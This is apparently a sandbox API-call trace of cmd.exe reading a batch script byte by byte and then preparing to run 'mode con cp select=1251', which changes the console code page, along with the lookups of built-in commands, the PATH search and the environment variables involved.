1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.796] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.796] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.796] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.796] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.796] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.796] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0034.796] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.796] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.797] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0034.797] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.797] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.797] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0034.797] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.797] GetFileType (hFile=0xe8) returned 0x3 [0034.797] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.797] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.797] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.797] GetFileType (hFile=0xf4) returned 0x3 [0034.797] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.797] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0034.797] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x20f6d8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f6d8*=0x18, lpOverlapped=0x0) returned 1 [0034.797] GetProcessHeap () returned 0x2f0000 [0034.797] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30cd20 [0034.797] GetProcessHeap () returned 0x2f0000 [0034.797] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd20 | out: hHeap=0x2f0000) returned 1 [0034.798] _wcsicmp (_String1="mode", _String2=")") returned 68 [0034.798] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0034.798] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0034.798] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0034.798] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0034.798] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0034.798] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0034.798] GetProcessHeap () returned 0x2f0000 [0034.798] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x3097e0 [0034.798] GetProcessHeap () returned 0x2f0000 [0034.798] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x304610 [0034.798] GetProcessHeap () returned 0x2f0000 [0034.798] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x38) returned 0x306510 [0034.799] GetConsoleOutputCP () returned 0x1b5 [0034.799] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e1bfe0 | out: lpCPInfo=0x49e1bfe0) returned 1 [0034.799] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0034.799] GetConsoleTitleW (in: lpConsoleTitle=0x20f690, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0034.799] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0034.799] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0034.799] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0034.799] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0034.800] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0034.800] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0034.800] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0034.800] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0034.800] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0034.800] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0034.800] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0034.800] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0034.800] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0034.800] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0034.800] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0034.800] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0034.800] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0034.800] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0034.800] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0034.800] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0034.800] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0034.800] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0034.800] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0034.800] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0034.800] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0034.800] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0034.800] _wcsicmp (_String1="mode", _String2="START") returned -6 [0034.800] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0034.800] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0034.800] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0034.800] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0034.800] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0034.800] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0034.800] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0034.800] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0034.800] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0034.800] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0034.800] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0034.800] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0034.800] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0034.800] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0034.800] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0034.800] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0034.801] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0034.801] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0034.801] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0034.801] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0034.801] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0034.801] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0034.801] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0034.801] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0034.801] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0034.801] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0034.801] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0034.801] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0034.801] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0034.801] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0034.801] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0034.801] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0034.801] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0034.801] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0034.801] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0034.801] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0034.801] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0034.801] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0034.801] _wcsicmp (_String1="mode", _String2="START") returned -6 [0034.801] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0034.801] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0034.801] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0034.801] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0034.801] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0034.801] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0034.801] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0034.801] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0034.801] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0034.801] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0034.801] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0034.801] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0034.801] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0034.801] GetProcessHeap () returned 0x2f0000 [0034.801] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x2f1ab0 [0034.801] GetProcessHeap () returned 0x2f0000 [0034.801] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x42) returned 0x3098a0 [0034.802] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0034.802] GetProcessHeap () returned 0x2f0000 [0034.802] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x309a80 [0034.802] SetErrorMode (uMode=0x0) returned 0x0 [0034.802] SetErrorMode (uMode=0x1) returned 0x0 [0034.802] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x309a90, lpFilePart=0x20ef20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x20ef20*="Desktop") returned 0x25 [0034.802] SetErrorMode (uMode=0x0) returned 0x1 [0034.802] GetProcessHeap () returned 0x2f0000 [0034.802] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309a80, Size=0x66) returned 0x309a80 [0034.802] GetProcessHeap () returned 0x2f0000 [0034.802] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309a80) returned 0x66 [0034.802] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.802] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0034.802] GetProcessHeap () returned 0x2f0000 [0034.802] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x2f1cd0 [0034.802] GetProcessHeap () returned 0x2f0000 [0034.802] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x309b00 [0034.807] GetProcessHeap () returned 0x2f0000 [0034.807] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309b00, Size=0x12a) returned 0x309b00 [0034.807] GetProcessHeap () returned 0x2f0000 [0034.807] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309b00) returned 0x12a [0034.807] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.807] GetProcessHeap () returned 0x2f0000 [0034.807] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x305b70 [0034.807] GetProcessHeap () returned 0x2f0000 [0034.807] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x305b70, Size=0x7e) returned 0x305b70 [0034.807] GetProcessHeap () returned 0x2f0000 [0034.807] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305b70) returned 0x7e [0034.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.808] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0xffffffffffffffff [0034.808] GetLastError () returned 0x2 [0034.808] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0xffffffffffffffff [0034.808] GetLastError () returned 0x2 [0034.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.809] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0x305c00 [0034.809] GetProcessHeap () returned 0x2f0000 [0034.809] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x304640 [0034.809] FindClose (in: hFindFile=0x305c00 | out: hFindFile=0x305c00) returned 1 [0034.809] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0x305c00 [0034.809] GetProcessHeap () returned 0x2f0000 [0034.809] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304640, Size=0x8) returned 0x3098f0 [0034.809] FindClose (in: hFindFile=0x305c00 | out: hFindFile=0x305c00) returned 1 [0034.809] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0034.809] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0034.809] GetConsoleTitleW (in: lpConsoleTitle=0x20f1e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0034.809] GetProcessHeap () returned 0x2f0000 [0034.809] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x21c) returned 0x309c40 [0034.809] GetConsoleTitleW (in: lpConsoleTitle=0x309c50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0034.809] GetProcessHeap () returned 0x2f0000 [0034.809] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309c40, Size=0xa8) returned 0x309c40 [0034.809] GetProcessHeap () returned 0x2f0000 [0034.809] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309c40) returned 0xa8 [0034.809] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0034.810] GetProcessHeap () returned 0x2f0000 [0034.810] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309c40 | out: hHeap=0x2f0000) returned 1 [0034.810] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ef98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef58 | out: lpAttributeList=0x20ef98, lpSize=0x20ef58) returned 1 [0034.810] UpdateProcThreadAttribute (in: lpAttributeList=0x20ef98, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ef98, lpPreviousValue=0x0) returned 1 [0034.810] GetStartupInfoW (in: lpStartupInfo=0x20f0b0 | out: lpStartupInfo=0x20f0b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0034.810] GetProcessHeap () returned 0x2f0000 [0034.810] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304640 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.811] 